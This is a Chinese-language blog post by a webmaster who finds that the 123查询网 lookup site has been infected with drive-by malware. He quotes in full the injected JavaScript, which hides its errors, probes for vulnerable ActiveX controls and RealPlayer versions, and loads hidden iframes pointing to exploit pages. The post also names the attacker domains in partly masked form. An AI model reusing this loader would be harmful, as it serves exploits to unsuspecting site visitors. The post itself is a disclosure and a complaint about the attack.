现在是凌晨2点45分,作为一个草根站长的我还没有睡觉,应该凡是铁杆站长的应该现在都还没睡吧(废话)!
本来是要查自己刚注册的一个小游戏的网站域名解析是否生效了,所以就到123查询网查询了一下,结果令我吃惊的是出现的一片乱码,难道是我输入的网址输错了?结果仔细一看并没有输错啊。再查看一下代码,结果令我大吃一惊,PHP编写的123查询网居然被挂马了,难道除了ASP现在连PHP也不安全了吗?以我分析的话按理说123查询网流量这么大,在国内也算是数得着的一流站点了,怎么会出现这样的情况,难道是服务器安全问题吗?还是黑客找到了新的PHP漏洞?一连串的问题出现在我的脑海中!
123查询网被挂的是什么马?是哪位高人挂的啊,看了下代码被插入的马调用的(为了不让大家打开网页,害怕有毒,所以吧域名加了个*)nima12*.cn/zz.htm?a005 再打开这个页面后又是一个调用laoda123*.cn/web.htm,这个页面里的代码如下:
<script>
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
document.write("<iframe width=100 height=0 src=xx.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0
src=office.htm></iframe>");}}
try{var n;
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0
src=UU.htm></iframe>");}}
try{var b;
var ml=new ActiveXObject("DPClient.Vod");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0
src=Thunder.htm></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0
src=lz.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
document.write("<iframe width=100 height=0 src=real10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real11.htm></iframe>");
}
test();
document.write("");
</script>
连环调用了好几个页面,估计是为了刷流量吧,或者有插件?123查询网的流量如此巨大,确实给黑客带去了不少东西呵呵。
现在是凌晨3点40分,123查询网的站长还没做出反应,可能是不知道自己的站点除了问题,也可能是在积极调整服务器!
我个人感觉大家都是中国人,兔子不吃窝边草,为什么有的高手非要破坏别人的网站呢?真诚的希望高手们一致对外,真的要搞破坏也不要拿自己人开刀!当然我说这句话可能有的黑客高手要不高兴了,不过我说的是实话,还希望各位高手下手之前先想一想,如果是自己的网站被黑了是什么感觉呢?让我们共同为中国的网络事业做出点贡献不好么?不要再让国外的一些人渣瞧不起了!
在此祝你早日修复123查询网,因为我一直在用,应该是好多人都在用,希望贵站越办越好!
